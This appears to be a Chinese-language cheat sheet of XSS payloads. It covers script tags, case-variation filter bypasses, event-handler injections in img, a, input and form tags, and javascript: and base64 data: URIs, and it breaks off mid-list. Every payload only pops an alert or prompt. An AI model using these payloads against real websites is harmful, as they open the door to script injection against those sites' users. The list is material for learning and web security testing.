XSS总结

XSS总结

基本命令

一、标准语句

1
<script>alert(/XSS/)</script>

二、尝试大小写

1
<sCript>alert(1)</scRipt>

三、使用标签

1、windows事件

1
2
3
4
5
<img src="x" onerror=alert(1)>

<img src="1" onerror=eval("alert('xss')")>

//图片加载错误时触发

2、鼠标事件

1
2
3
4
5
6
7
<img src=1 onmouseover="alert(1)">

//鼠标指针移动到元素时触发

<img src=1 onmouseout="alert(1)">

//鼠标指针移出时触发

四、使用标签

1、使用href属性

1
2
3
4
5
6
7
8
9
10
11
<a href="https://www.qq.com">qq</a>

<a href=javascript:alert('xss')>test</a>

<a href="javascript:a" onmouseover="alert(/xss/)">aa</a>

<a href="" onclick=alert('xss')>a</a>

<a href="" onclick=eval(alert('xss'))>aa</a>

<a href=kycg.asp?ttt=1000 onmouseover=prompt('xss') y=2016>aa</a>

五、使用标签

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<input name="name" value="">

<input value="" onclick=alert('xss') type="text">

<input name="name" value="" onmouseover=prompt('xss') bad="">

<input name="name" value=""><script>alert('xss')</script>

<input type="text" onkeydown="alert(1)">

//用户按下按键时触发

<input type="text" onkeypress="alert(1)">

//用户按下按键时触发

<input type="text" onkeyup="alert(1)">

//用户松开按键时触发

六、使用标签

1
2
3
4
5
<form action=javascript:alert('xss') method="get"><form action=javascript:alert('xss')>

<form method=post action=aa.asp? onmouseover=prompt('xss')><form method=post action=aa.asp? onmouseover=alert('xss')><form action=1 onmouseover=alert('xss)>

<!--原code--><form method=post action="data:text/html;base64,<script>alert('xss')</script>"><!--base64编码--><form method=post action="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">

七、 使用